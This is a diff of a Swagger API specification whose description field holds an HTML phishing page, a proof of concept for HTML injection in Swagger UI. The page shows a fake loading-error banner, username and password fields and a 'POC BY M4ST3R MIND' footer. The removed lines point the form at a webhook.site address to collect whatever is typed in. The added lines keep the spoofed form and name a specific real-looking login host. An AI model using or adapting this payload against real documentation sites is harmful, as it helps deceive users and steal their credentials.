--- a/cookie.yaml
+++ b/cookie.yaml
@@ -1,45 +1,75 @@
 swagger: "2.0"
+
 info:
-  version: 1.0.0
   title: Login Page
-  description: '<div class="login-form">
-<!-- Error Message -->
-<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
-  <div style="background-color: #f8d7da; color: #721c24; padding: 16px 20px; border-radius: 4px; border: 1px solid #f5c6cb; font-size: 16px; text-align: center;">
-    <strong>An error occurred while loading, please log in.</strong>
-  </div>
-</div>
-
-<!-- Login Form -->
-<div class="heading">
-  <h1 style="text-align: center; font-size: 24px; color: #333; margin-bottom: 20px;">Login Page</h1>
-  <div class="form-container" style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #fff; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
-    <form action="#webhook.site/88df8b9f-eb20-45f7-bc34-d84656d6154f" method="post" class="form-signin">
-      <div class="form-group" style="margin-bottom: 15px;">
-        <label for="username" style="font-size: 14px; color: #555; display: block; margin-bottom: 5px;">Username</label>
-        <input type="text" name="username" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
+  version: "1.0.0"
+  description: |
+    <div class="login-form">
+      <div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
+        <div style="background-color: #f8d7da; color: #721c24; padding: 16px 20px; border-radius: 4px; border: 1px solid #f5c6cb; font-size: 16px; text-align: center;">
+          <strong>An error occurred while loading, please log in</strong>
+        </div>
       </div>
-      <div class="form-group" style="margin-bottom: 15px;">
-        <label for="password" style="font-size: 14px; color: #555; display: block; margin-bottom: 5px;">Password</label>
-        <input type="password" name="password" size="20" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
+
+      <h1 style="text-align: center; font-size: 24px; color: #333; margin-bottom: 20px;">
+        Login Page
+      </h1>
+
+      <div style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #fff; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
+        <form>
+          <div style="margin-bottom: 15px;">
+            <label style="font-size: 14px; color: #555;">Username</label>
+            <input type="text" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
+          </div>
+
+          <div style="margin-bottom: 15px;">
+            <label style="font-size: 14px; color: #555;">Password</label>
+            <input type="password" style="width: 100%; padding: 10px; font-size: 14px; border: 1px solid #ccc; border-radius: 4px;">
+          </div>
+
+          <button type="button" style="width: 100%; padding: 12px; background-color: #5cb85c; border: none; color: white; font-size: 16px; border-radius: 4px; cursor: pointer;">
+            Login
+          </button>
+        </form>
       </div>
-      <div class="form-group" style="margin-top: 20px;">
-        <button type="submit" class="btn btn-default" style="width: 100%; padding: 12px; background-color: #5cb85c; border: none; color: white; font-size: 16px; border-radius: 4px; cursor: pointer; transition: background-color 0.3s;">Login</button>
+
+      <div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
+        POC BY M4ST3R MIND
       </div>
-    </form>
-  </div>
-</div>
+    </div>
 
-<!-- Footer with your name -->
-<div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
-  POC BY M4ST3R MIND
-</div>
+host: login.connect.iai.co.il
+basePath: /
+schemes:
+  - https
 
+consumes:
+  - application/json
+produces:
+  - application/json
 
-  '
 paths:
-  /:
+  /login:
     post:
+      summary: Login endpoint
+      description: Authenticate user credentials
+      operationId: loginUser
+      parameters:
+        - in: body
+          name: credentials
+          required: true
+          schema:
+            type: object
+            required:
+              - username
+              - password
+            properties:
+              username:
+                type: string
+              password:
+                type: string
       responses:
-        '200':
+        "200":
           description: Login successful
+        "401":
+          description: Invalid credentials
